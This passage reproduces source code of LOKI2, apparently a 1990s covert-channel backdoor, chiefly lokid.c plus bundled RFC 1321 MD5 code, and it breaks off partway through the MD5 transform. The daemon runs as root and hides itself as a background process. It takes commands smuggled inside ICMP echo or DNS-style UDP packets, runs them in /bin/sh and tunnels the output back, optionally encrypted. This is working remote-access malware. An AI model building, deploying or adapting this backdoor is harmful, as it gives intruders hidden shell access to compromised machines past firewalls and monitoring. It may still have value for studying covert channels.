+u_short i_check(u_short *, int);        /* Ah yes, the IP family checksum   */
+int c_parse(u_char *, int *);           /* parse escaped commands [client]  */
+void d_parse(u_char *, pid_t, int);     /* parse escaped commands [server]  */
+                                        /* build and transmit LOKI packets  */
+void loki_xmit(u_char *, u_short, int, struct sockaddr_in, int);
+int lokid_xmit(u_char *, u_long, int, int);
+void err_exit(int, int, int, char *);   /* handle exit with reason          */
+void clean_exit(int);                   /* exit cleanly                     */
+void help();                            /* lala                             */
+void shadow();                          /* daemonizing routine              */
+void swap_t(int);                       /* swap protocols [server-side]     */
+void reaper(int);                       /* prevent zombies                  */
+void catch_timeout(int);                /* ALARM signal catcher             */
+void client_expiry_check();             /* expire client from shm           */
+void prep_shm();                        /* Prepare shm ans semaphore        */
+void dump_shm();                        /* detach shm                       */
+void packets_read();                    /* packets read (client)            */
+void fd_status(int, int);               /* dumps fd stats                   */
+#ifdef PTY
+int ptym_open(char *);
+int ptys_open(int, char *);
+pid_t pty_fork(int *, char *, struct termios *, struct winsize *);
+#endif
+#ifdef STRONG_CRYPTO
+DH* generate_dh_keypair();              /* generate DH params and keypair   */
+u_char *extract_bf_key(u_char *, int);  /* extract and md5 and set bf key   */
+#endif
+
+#endif  /* __LOKI_H__ */
+<--> loki.h
+<++> L2/lokid.c
+/*
+ * LOKI2
+ *
+ * [ lokid.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9] 
+ */
+
+
+#include "loki.h"
+#include "client_db.h"
+#include "shm.h"
+
+jmp_buf env;                            /* holds our stack frame    */
+struct loki sdg, rdg;                   /* LOKI packets             */
+time_t uptime   = 0;                    /* server uptime            */
+u_long b_sent   = 0, p_sent = 0;        /* bytes / packets written  */ 
+u_short c_id    = 0;                    /* client id                */
+int destroy_shm = NOK;                  /* Used to mark whether or not
+                                         * a process should destroy the
+                                         * shm segment upon exiting.
+                                         */
+int verbose     = OK, prot = IPPROTO_ICMP, ripsock = 0, tsock = 0; 
+
+#ifdef  STRONG_CRYPTO
+extern u_char user_key[BF_KEYSIZE];
+extern BF_KEY bf_key;
+extern u_short ivec_salt;               
+DH *dh_keypair = NULL;                  /* DH public and private key */
+#endif
+
+#ifdef PTY
+int mfd = 0;                            /* master PTY file descriptor */
+#endif
+
+int main(int argc, char *argv[])
+{
+
+    static int one       = 1, c = 0, cflags = 0;
+    u_char buf1[BUFSIZE] = {0};
+    pid_t pid            = 0;
+#ifdef  STRONG_CRYPTO
+    static int c_ind     = -1;
+#endif
+#ifdef  POPEN
+    FILE *job            = NULL;
+    char buf2[BUFSIZE]   = {0};
+#endif
+                                        /* ensure we have proper permissions */
+    if (geteuid() || getuid()) err_exit(0, 1, 1, L_MSG_NOPRIV);
+    while ((c = getopt(argc, argv, "v:p:")) != EOF)
+    {
+        switch (c)
+        {
+            case 'v':                   /* change verbosity */
+                verbose = atoi(optarg);
+                break;
+
+            case 'p':                   /* choose transport protocol */
+                switch (optarg[0])
+                {
+                    case 'i':           /* ICMP_ECHO / ICMP_ECHOREPLY */
+                        prot = IPPROTO_ICMP;
+                        break;
+
+                    case 'u':           /* DNS query / reply */
+                        prot = IPPROTO_UDP;
+                        break;
+
+                    default:
+                        err_exit(1, 0, 1, "Unknown transport\n");
+                }
+                break;
+
+            default:
+                err_exit(0, 0, 1, S_MSG_USAGE);
+        }
+    }                               
+    if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
+        err_exit(1, 1, 1, L_MSG_SOCKET);
+#ifdef  STRONG_CRYPTO                   /* ICMP only with strong crypto */
+    if (prot != IPPROTO_ICMP) err_exit(0, 0, 1, L_MSG_ICMPONLY);
+#else
+                                        /* Child will signal parent if a 
+                                         * transport protcol switch is 
+                                         * required 
+                                         */
+    if (signal(SIGUSR1, swap_t) == SIG_ERR) 
+        err_exit(1, 1, verbose, L_MSG_SIGUSR1);
+#endif
+
+    if ((ripsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+         err_exit(1, 1, 1, L_MSG_SOCKET);
+#ifdef  DEBUG
+    fprintf(stderr, "\nRaw IP socket: ");
+    fd_status(ripsock, OK);
+#endif
+
+#ifdef  IP_HDRINCL
+    if (setsockopt(ripsock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
+        if (verbose) perror("Cannot set IP_HDRINCL socket option");
+#endif
+                                        /* power up shared memory segment and
+                                         * semaphore, register dump_shm to be 
+                                         * called upon exit
+                                         */
+    prep_shm();
+    if (atexit(dump_shm) == -1) err_exit(1, 1, verbose, L_MSG_ATEXIT);
+
+    fprintf(stderr, L_MSG_BANNER);
+    time(&uptime);                      /* server uptime timer */
+
+#ifdef  STRONG_CRYPTO
+                                        /* Generate DH parameters */
+    if (verbose) fprintf(stderr, "\nlokid: %s", L_MSG_DHKEYGEN); 
+    if (!(dh_keypair = generate_dh_keypair())) 
+        err_exit(1, 0, verbose, L_MSG_DHKGFAIL);
+    if (verbose) fprintf(stderr, "\nlokid: done.\n"); 
+#endif 
+#ifndef DEBUG
+    shadow();                       /* go daemon */
+#endif
+    destroy_shm = OK;               /* if this process exits at any point
+                                     * from hereafter, mark shm as destroyed
+                                     */
+                                    /* Every KEY_TIMER seconds, we should
+                                     * check the client_key list and see
+                                     * if any entries have been idle long
+                                     * enough to expire them.
+                                     */
+    if (signal(SIGALRM, client_expiry_check) == SIG_ERR)
+        err_exit(1, 1, verbose, L_MSG_SIGALRM);
+    alarm(KEY_TIMER);
+
+    if (signal(SIGCHLD, reaper) == SIG_ERR)
+        err_exit(1, 1, verbose, L_MSG_SIGCHLD);
+
+    for (; ;)
+    {
+        cflags &= ~VALIDP;              /* Blocking read */
+        c = read(tsock, (struct loki *)&rdg, LOKIP_SIZE);
+
+        switch (prot)
+        {                               /* Is this a valid Loki packet? */
+            case IPPROTO_ICMP:
+                if ((IS_GOOD_ITYPE_D(rdg)))
+                { 
+                    cflags |= VALIDP;
+                    c_id   = rdg.ttype.icmph.icmp_id;
+                }
+                break;
+
+            case IPPROTO_UDP:
+                if ((IS_GOOD_UTYPE_D(rdg)))
+                { 
+                    cflags |= VALIDP;
+                    c_id   = rdg.ttype.udph.uh_sport;
+                }
+                break;
+
+            default:
+                err_exit(1, 0, verbose, L_MSG_WIERDERR);
+        }
+        if (cflags & VALIDP)
+        {
+#ifdef  DEBUG
+        fprintf(stderr, "\n[DEBUG]\t\tlokid: packet read %d bytes, type: ", c);
+        PACKET_TYPE(rdg);
+        DUMP_PACKET(rdg, c);
+#endif
+	    switch (pid = fork())
+            {                           
+	        case 0:                 
+                    destroy_shm = NOK;  /* child should NOT mark segment as
+                                         * destroyed when exiting...
+                                         */
+                                        /* TLI seems to have  problems in 
+                                         * passing socket file desciptors around
+                                         */
+#ifdef  SOLARIS                         
+                    close(ripsock);
+                    if ((ripsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+                    err_exit(1, 1, 1, L_MSG_SOCKET);
+#ifdef  DEBUG
+                    fprintf(stderr, "\nRaw IP socket: ");
+                    fd_status(ripsock, OK);
+#endif  /* DEBUG */
+#endif  /* SOLARIS */
+    		    break;
+
+                default:                /* parent will loop forever spawning 
+                                         * children if we do not zero rdg
+                                         */
+                    bzero((struct loki *)&rdg, LOKIP_SIZE);
+                    cflags &= ~VALIDP;
+		    continue;
+
+	        case -1:            /* fork error */
+		    err_exit(1, 1, verbose, "[fatal] forking error");
+            }
+#ifdef  STRONG_CRYPTO
+                                        /* preliminary evaluation of the pkt
+                                         * to see if we have a request for the
+                                         * servers public key
+                                         */
+            if (rdg.payload[0] == L_PK_REQ)
+            {
+                if (verbose)
+                {
+                    fprintf(stderr, "\nlokid: public key submission and request : %s <%d> ", host_lookup(rdg.iph.ip_dst), c_id);
+                    fprintf(stderr, "\nlokid: computing shared secret");
+                }
+                DH_compute_key(buf1, (void *)BN_bin2bn(&rdg.payload[1], BN2BIN_SIZE, NULL), dh_keypair);
+                if (verbose) fprintf(stderr, "\nlokid: extracting 128-bit blowfish key");
+                                        /* Try to add client to client list */
+                if (((c = add_client(extract_bf_key(buf1, NOK))) == -1))
+                {
+#else
+                if (((c = add_client((u_char *)NULL)) == -1))
+                {
+#endif                                  /* MAX_CLIENT limit reached */
+                    lokid_xmit(S_MSG_PACKED, LP_DST, L_ERR, NOCR);
+                    lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
+                    err_exit(1, 0, verbose, "\nlokid: Cannot add key\n");
+                }
+
+#ifdef  STRONG_CRYPTO
+                if (verbose)
+                { 
+                    fprintf(stderr, "\nlokid: client <%d> added to list [%d]", c_id, c);
+                    fprintf(stderr, "\nlokid: submiting my public key to client");
+                }                       /* send our public key to the client */
+                bzero((u_char *)buf1, BUFSIZE);
+                BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, buf1);   
+
+                lokid_xmit(buf1, LP_DST, L_PK_REPLY, NOCR);
+                lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
+                clean_exit(0);
+            }
+            bzero((u_char *)buf1, BUFSIZE);
+                                        /* Control falls here when we have
+                                         * a regular request packet.
+                                         */
+            if ((c_ind = locate_client(FIND)) == -1)
+            {                           /* Cannot locate the client's entry */
+                lokid_xmit(S_MSG_UNKNOWN, LP_DST, L_ERR, NOCR);
+                lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
+                err_exit(1, 0, verbose, S_MSG_UNKNOWN);
+            }                           /* set expanded blowfish key */
+            else BF_set_key(&bf_key, BF_KEYSIZE, user_key);
+#endif
+                                        /* unload payload */
+   	    bcopy(&rdg.payload[1], buf1, BUFSIZE - 1);
+#ifdef  STRONG_CRYPTO
+                                        /* The IV salt is incremented in the
+                                         * client prior to encryption, ergo
+                                         * the server should increment before 
+                                         * decrypting
+                                         */
+            ivec_salt = update_client_salt(c_ind);
+#endif
+            blur(DECR, BUFSIZE - 1, buf1);
+                                        /* parse escaped command */
+            if (buf1[0] == '/') d_parse(buf1, pid, ripsock);
+#ifdef  POPEN                           /* popen the shell command and execute
+                                         * it inside of /bin/sh
+                                         */ 
+            if (!(job = popen(buf1, "r")))
+                err_exit(1, 1, verbose, "\nlokid: popen");
+
+            while (fgets(buf2, BUFSIZE - 1, job))
+            {
+                bcopy(buf2, buf1, BUFSIZE);
+                lokid_xmit(buf1, LP_DST, L_REPLY, OKCR);
+            }
+            lokid_xmit(buf1, LP_DST, L_EOT, OKCR);
+#ifdef  STRONG_CRYPTO
+            update_client(c_ind, p_sent, b_sent);
+#else
+            update_client(locate_client(FIND), p_sent, b_sent);
+#endif
+            clean_exit(0);              /* exit the child after sending
+                                         * the last packet 
+                                         */
+#endif
+#ifdef  PTY                             /* Not implemented yet */
+            fprintf(stderr, "\nmfd: %d", mfd);
+#endif
+        }
+    }
+}
+
+
+/*
+ *  Build and transmit Loki packets (server-side version)
+ */
+
+int lokid_xmit(u_char *payload, u_long dst, int ptype, int crypt_flag)
+{
+    struct sockaddr_in sin;
+    int i               = 0; 
+
+    bzero((struct loki *)&sdg, LOKIP_SIZE);
+
+    sin.sin_family      = AF_INET;
+    sin.sin_addr.s_addr = dst;
+    sdg.payload[0]      = ptype;        /* set packet type */
+                                        /* Do not encrypt error or public
+                                         * key reply packets
+                                         */       
+    if (crypt_flag == OKCR) blur(ENCR, BUFSIZE - 1, payload);	
+    bcopy(payload, &sdg.payload[1], BUFSIZE - 1);
+
+    if (prot == IPPROTO_ICMP)
+    {
+#ifdef  NET3                                            /* Our workaround. */
+        sdg.ttype.icmph.icmp_type   = ICMP_ECHO;
+#else
+        sdg.ttype.icmph.icmp_type   = ICMP_ECHOREPLY;
+#endif
+        sdg.ttype.icmph.icmp_code   = (int)NULL;
+        sdg.ttype.icmph.icmp_id     = c_id;             /* client ID */
+        sdg.ttype.icmph.icmp_seq    = L_TAG;            /* Loki ID */
+        sdg.ttype.icmph.icmp_cksum  =
+             i_check((u_short *)&sdg.ttype.icmph, BUFSIZE + ICMPH_SIZE);
+    }
+    if (prot == IPPROTO_UDP)
+    {
+        sdg.ttype.udph.uh_sport     = NL_PORT;
+        sdg.ttype.udph.uh_dport     = rdg.ttype.udph.uh_sport;
+        sdg.ttype.udph.uh_ulen      = htons(UDPH_SIZE + BUFSIZE);
+        sdg.ttype.udph.uh_sum       =
+             i_check((u_short *)&sdg.ttype.udph, BUFSIZE + UDPH_SIZE);
+    }
+    sdg.iph.ip_v    = 0x4;
+    sdg.iph.ip_hl   = 0x5;
+    sdg.iph.ip_len  = FIX_LEN(LOKIP_SIZE);
+    sdg.iph.ip_ttl  = 0x40;
+    sdg.iph.ip_p    = prot;
+    sdg.iph.ip_dst  = sin.sin_addr.s_addr;
+ 
+#ifdef  SEND_PAUSE
+    usleep(SEND_PAUSE);
+#endif
+    if ((i = sendto(ripsock, (struct loki *)&sdg, LOKIP_SIZE, (int)NULL, (struct sockaddr *)&sin, sizeof(sin))) < LOKIP_SIZE)
+    {
+        if (verbose) perror("[non fatal] truncated write");
+    }
+    else
+    {                               /* Update global stats */
+        b_sent += i; 
+        p_sent ++;
+    }
+    return ((i < 0 ? 0 : i));     /* Make snocrash happy (return bytes written,
+                                   * or return 0 if there was an error) 
+                                   */
+}
+
+
+/*
+ *  Parse escaped commands (server-side version)
+ */
+
+void d_parse(u_char *buf, pid_t pid, int ripsock)
+{
+    u_char buf2[4 * BUFSIZE]    = {0};
+    int n                       = 0, m = 0;
+    u_long client_ip            = 0;
+                                        /* client request for an all kill */
+    if (!strncmp(buf, QUIT_ALL, sizeof(QUIT_ALL) - 1))
+    {
+        if (verbose) fprintf(stderr, "\nlokid: client <%d> requested an all kill\n", c_id);
+        while (n < MAX_CLIENT)          /* send notification to all clients */
+        {
+            if ((client_ip = check_client_ip(n++, &c_id)))
+            {
+                if (verbose) fprintf(stderr, "\tsending L_QUIT: <%d> %s\n", c_id, host_lookup(client_ip));
+                lokid_xmit(buf, client_ip, L_QUIT, NOCR);
+            }
+        }
+        if (verbose) fprintf(stderr, S_MSG_CLIENTK);
+                                        /* send a SIGKILL to all the processes
+                                         * in the servers group...
+                                         */
+        if ((kill(-pid, SIGKILL)) == -1)
+            err_exit(1, 1, verbose, "[fatal] could not signal process group");
+        clean_exit(0);
+    }
+                                        /* client is exited, remove entry
+                                         * from the client list
+                                         */
+    if (!strncmp(buf, QUIT_C, sizeof(QUIT_C) - 1))
+    {
+        if ((m = locate_client(DESTROY)) == -1) 
+            err_exit(1, 0, verbose, S_MSG_UNKNOWN);
+        else if (verbose) fprintf(stderr, "\nlokid: client <%d> freed from list [%d]", c_id, m);
+        clean_exit(0);
+    }
+                                        /* stat request */
+    if (!strncmp(buf, STAT_C, sizeof(STAT_C) - 1))
+    {
+        bzero((u_char *)buf2, 4 * BUFSIZE);
+                                        /* Ok.  This is an ugly hack to keep
+                                         * packet counts in sync with the
+                                         * stat request.  We know the amount
+                                         * of packets we are going to send (and
+                                         * therefore the byte count) in advance
+                                         * so we can preload the values.
+                                         */
+        update_client(locate_client(FIND), 5, 5 * LOKIP_SIZE);
+        n = stat_client(locate_client(FIND), buf2, prot, uptime);
+                                        /* breakdown payload into BUFSIZE-1 
+                                         * chunks, suitable for transmission
+                                         */
+        for (; m < n; m += (BUFSIZE - 1))
+        {
+            bcopy(&buf2[m], buf, BUFSIZE - 1);
+            lokid_xmit(buf, LP_DST, L_REPLY, OKCR);
+        }
+        lokid_xmit(buf, LP_DST, L_EOT, OKCR);
+        clean_exit(0);                  /* exit the child after sending
+                                         * the last packet 
+                                         */
+    }
+#ifndef     STRONG_CRYPTO               /* signal parent to change protocols */
+    if (!strncmp(buf, SWAP_T, sizeof(SWAP_T) - 1))
+    {
+        if (kill(getppid(), SIGUSR1))
+            err_exit(1, 1, verbose, "[fatal] could not signal parent");
+        clean_exit(0);
+    }
+#endif
+                                        /* unsupport/unrecognized command */
+    lokid_xmit(S_MSG_UNSUP, LP_DST, L_REPLY, OKCR);
+    lokid_xmit(buf2, LP_DST, L_EOT, OKCR);
+
+    update_client(locate_client(FIND), p_sent, b_sent);
+    clean_exit(0);
+}
+
+
+/* 
+ *  Swap transport protocols.  This is called as a result of SIGUSR1 from
+ *  a child server process.
+ */
+
+
+void swap_t(int signo)
+{
+
+    int n                   = 0;
+    u_long client_ip        = 0;
+    struct protoent *pprot  = 0;
+    char buf[BUFSIZE]       = {0};
+  
+    if (verbose) fprintf(stderr, "\nlokid: client <%d> requested a protocol swap\n", c_id);
+
+    while (n < MAX_CLIENT)
+    {
+        if ((client_ip = check_client_ip(n++, &c_id)))
+        {
+            fprintf(stderr, "\tsending protocol update: <%d> %s [%d]\n", c_id, host_lookup(client_ip), n);
+            lokid_xmit(buf, client_ip, L_REPLY, OKCR);
+            lokid_xmit(buf, client_ip, L_EOT, OKCR);
+/*            update_client(locate_client(FIND), p_sent, b_sent);*/
+        }
+    }
+
+    close(tsock);
+
+    prot = (prot == IPPROTO_UDP) ? IPPROTO_ICMP : IPPROTO_UDP;
+    if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
+        err_exit(1, 1, verbose, L_MSG_SOCKET);
+    pprot = getprotobynumber(prot);  
+    sprintf(buf, "lokid: transport protocol changed to %s\n", pprot -> p_name);
+    fprintf(stderr, "\n%s", buf);
+
+    lokid_xmit(buf, LP_DST, L_REPLY, OKCR);
+    lokid_xmit(buf, LP_DST, L_EOT, OKCR);
+    update_client(locate_client(FIND), p_sent, b_sent);
+                                            /* re-establish signal handler */
+    if (signal(SIGUSR1, swap_t) == SIG_ERR)
+        err_exit(1, 1, verbose, L_MSG_SIGUSR1);
+}
+
+/* EOF */
+<--> lokid.c
+<++> L2/md5/Makefile
+# Makefile for MD5 from rfc1321 code
+
+CCF = -O -DMD=5
+
+md5c.o: md5.h global.h
+	gcc $(CCF) -c md5c.c
+
+clean:
+	rm -f *.o core
+<--> md5/Makefile
+<++> L2/md5/global.h
+/* GLOBAL.H - RSAREF types and constants
+ */
+
+/* PROTOTYPES should be set to one if and only if the compiler supports
+  function argument prototyping.
+The following makes PROTOTYPES default to 0 if it has not already
+
+
+
+Rivest                                                          [Page 7]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+
+
+  been defined with C compiler flags.
+ */
+#ifndef PROTOTYPES
+#define PROTOTYPES 0
+#endif
+
+/* POINTER defines a generic pointer type */
+typedef unsigned char *POINTER;
+
+/* UINT2 defines a two byte word */
+typedef unsigned short int UINT2;
+
+/* UINT4 defines a four byte word */
+typedef unsigned long int UINT4;
+
+/* PROTO_LIST is defined depending on how PROTOTYPES is defined above.
+If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it
+  returns an empty list.
+ */
+#if PROTOTYPES
+#define PROTO_LIST(list) list
+#else
+#define PROTO_LIST(list) ()
+#endif
+<--> md5/global.h
+<++> L2/md5/md5.h
+/* MD5.H - header file for MD5C.C
+ */
+
+/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
+rights reserved.
+
+License to copy and use this software is granted provided that it
+is identified as the "RSA Data Security, Inc. MD5 Message-Digest
+Algorithm" in all material mentioning or referencing this software
+or this function.
+
+License is also granted to make and use derivative works provided
+that such works are identified as "derived from the RSA Data
+Security, Inc. MD5 Message-Digest Algorithm" in all material
+mentioning or referencing the derived work.
+
+RSA Data Security, Inc. makes no representations concerning either
+the merchantability of this software or the suitability of this
+software for any particular purpose. It is provided "as is"
+without express or implied warranty of any kind.
+
+
+
+
+Rivest                                                          [Page 8]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+
+
+These notices must be retained in any copies of any part of this
+documentation and/or software.
+ */
+
+#define MD5_HASHSIZE    16
+
+/* MD5 context. */
+typedef struct {
+  UINT4 state[4];                                   /* state (ABCD) */
+  UINT4 count[2];        /* number of bits, modulo 2^64 (lsb first) */
+  unsigned char buffer[64];                         /* input buffer */
+} MD5_CTX;
+
+void MD5Init PROTO_LIST ((MD5_CTX *));
+void MD5Update PROTO_LIST
+  ((MD5_CTX *, unsigned char *, unsigned int));
+void MD5Final PROTO_LIST ((unsigned char [16], MD5_CTX *));
+<--> md5/md5.h
+<++> L2/md5/md5c.c
+/* MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
+ */
+
+/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
+rights reserved.
+
+License to copy and use this software is granted provided that it
+is identified as the "RSA Data Security, Inc. MD5 Message-Digest
+Algorithm" in all material mentioning or referencing this software
+or this function.
+
+License is also granted to make and use derivative works provided
+that such works are identified as "derived from the RSA Data
+Security, Inc. MD5 Message-Digest Algorithm" in all material
+mentioning or referencing the derived work.
+
+RSA Data Security, Inc. makes no representations concerning either
+the merchantability of this software or the suitability of this
+software for any particular purpose. It is provided "as is"
+without express or implied warranty of any kind.
+
+These notices must be retained in any copies of any part of this
+documentation and/or software.
+ */
+
+#include "global.h"
+#include "md5.h"
+
+/* Constants for MD5Transform routine.
+ */
+
+
+/*
+Rivest                                                          [Page 9]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+*/
+
+#define S11 7
+#define S12 12
+#define S13 17
+#define S14 22
+#define S21 5
+#define S22 9
+#define S23 14
+#define S24 20
+#define S31 4
+#define S32 11
+#define S33 16
+#define S34 23
+#define S41 6
+#define S42 10
+#define S43 15
+#define S44 21
+
+static void MD5Transform PROTO_LIST ((UINT4 [4], unsigned char [64]));
+static void Encode PROTO_LIST
+  ((unsigned char *, UINT4 *, unsigned int));
+static void Decode PROTO_LIST
+  ((UINT4 *, unsigned char *, unsigned int));
+static void MD5_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int));
+static void MD5_memset PROTO_LIST ((POINTER, int, unsigned int));
+
+static unsigned char PADDING[64] = {
+  0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+};
+
+/* F, G, H and I are basic MD5 functions.
+ */
+#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
+#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
+#define H(x, y, z) ((x) ^ (y) ^ (z))
+#define I(x, y, z) ((y) ^ ((x) | (~z)))
+
+/* ROTATE_LEFT rotates x left n bits.
+ */
+#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
+
+/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
+Rotation is separate from addition to prevent recomputation.
+ */
+#define FF(a, b, c, d, x, s, ac) { \
+ (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
+ (a) = ROTATE_LEFT ((a), (s)); \
+ (a) += (b); \
+  }
+#define GG(a, b, c, d, x, s, ac) { \
+ (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
+ (a) = ROTATE_LEFT ((a), (s)); \
+ (a) += (b); \
+  }
+#define HH(a, b, c, d, x, s, ac) { \
+ (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
+ (a) = ROTATE_LEFT ((a), (s)); \
+ (a) += (b); \
+  }
+#define II(a, b, c, d, x, s, ac) { \
+ (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
+ (a) = ROTATE_LEFT ((a), (s)); \
+ (a) += (b); \
+  }
+
+/* MD5 initialization. Begins an MD5 operation, writing a new context.
+ */
+void MD5Init (context)
+MD5_CTX *context;                                        /* context */
+{
+  context->count[0] = context->count[1] = 0;
+  /* Load magic initialization constants.
+*/
+  context->state[0] = 0x67452301;
+  context->state[1] = 0xefcdab89;
+  context->state[2] = 0x98badcfe;
+  context->state[3] = 0x10325476;
+}
+
+/* MD5 block update operation. Continues an MD5 message-digest
+  operation, processing another message block, and updating the
+  context.
+ */
+void MD5Update (context, input, inputLen)
+MD5_CTX *context;                                        /* context */
+unsigned char *input;                                /* input block */
+unsigned int inputLen;                     /* length of input block */
+{
+  unsigned int i, index, partLen;
+
+  /* Compute number of bytes mod 64 */
+  index = (unsigned int)((context->count[0] >> 3) & 0x3F);
+
+  /* Update number of bits */
+  if ((context->count[0] += ((UINT4)inputLen << 3))
+
+
+/*
+Rivest                                                         [Page 11]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+*/
+
+   < ((UINT4)inputLen << 3))
+ context->count[1]++;
+  context->count[1] += ((UINT4)inputLen >> 29);
+
+  partLen = 64 - index;
+
+  /* Transform as many times as possible.
+*/
+  if (inputLen >= partLen) {
+ MD5_memcpy
+   ((POINTER)&context->buffer[index], (POINTER)input, partLen);
+ MD5Transform (context->state, context->buffer);
+
+ for (i = partLen; i + 63 < inputLen; i += 64)
+   MD5Transform (context->state, &input[i]);
+
+ index = 0;
+  }
+  else
+ i = 0;
+
+  /* Buffer remaining input */
+  MD5_memcpy
+ ((POINTER)&context->buffer[index], (POINTER)&input[i],
+  inputLen-i);
+}
+
+/* MD5 finalization. Ends an MD5 message-digest operation, writing the
+  the message digest and zeroizing the context.
+ */
+void MD5Final (digest, context)
+unsigned char digest[16];                         /* message digest */
+MD5_CTX *context;                                       /* context */
+{
+  unsigned char bits[8];
+  unsigned int index, padLen;
+
+  /* Save number of bits */
+  Encode (bits, context->count, 8);
+
+  /* Pad out to 56 mod 64.
+*/
+  index = (unsigned int)((context->count[0] >> 3) & 0x3f);
+  padLen = (index < 56) ? (56 - index) : (120 - index);
+  MD5Update (context, PADDING, padLen);
+
+  /* Append length (before padding) */
+  MD5Update (context, bits, 8);
+
+
+/*
+Rivest                                                         [Page 12]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+*/
+
+  /* Store state in digest */
+  Encode (digest, context->state, 16);
+
+  /* Zeroize sensitive information.
+*/
+  MD5_memset ((POINTER)context, 0, sizeof (*context));
+}
+
+/* MD5 basic transformation. Transforms state based on block.
+ */
+static void MD5Transform (state, block)
+UINT4 state[4];
+unsigned char block[64];
+{
+  UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16];
+
+  Decode (x, block, 64);
+
+  /* Round 1 */
+  FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
+  FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
+  FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
+  FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
+  FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
+  FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
+  FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
+  FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
+  FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
+  FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
+  FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
+  FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
+  FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
+  FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
+  FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
+  FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
+
+ /* Round 2 */
+  GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
+  GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
+  GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
+  GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
+  GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
+  GG (d, a, b, c, x[10], S22,  0x2441453); /* 22 */
+  GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
+  GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
+  GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
+  GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
+  GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
+
+
+/*
+Rivest                                                         [Page 13]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+*/
+
+  GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
+  GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
+  GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
+  GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
+  GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
+
+  /* Round 3 */
+  HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
+  HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
+  HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
+  HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
+  HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
+  HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
+  HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
+  HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
+  HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
+  HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
+  HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
+  HH (b, c, d, a, x[ 6], S34,  0x4881d05); /* 44 */
+  HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
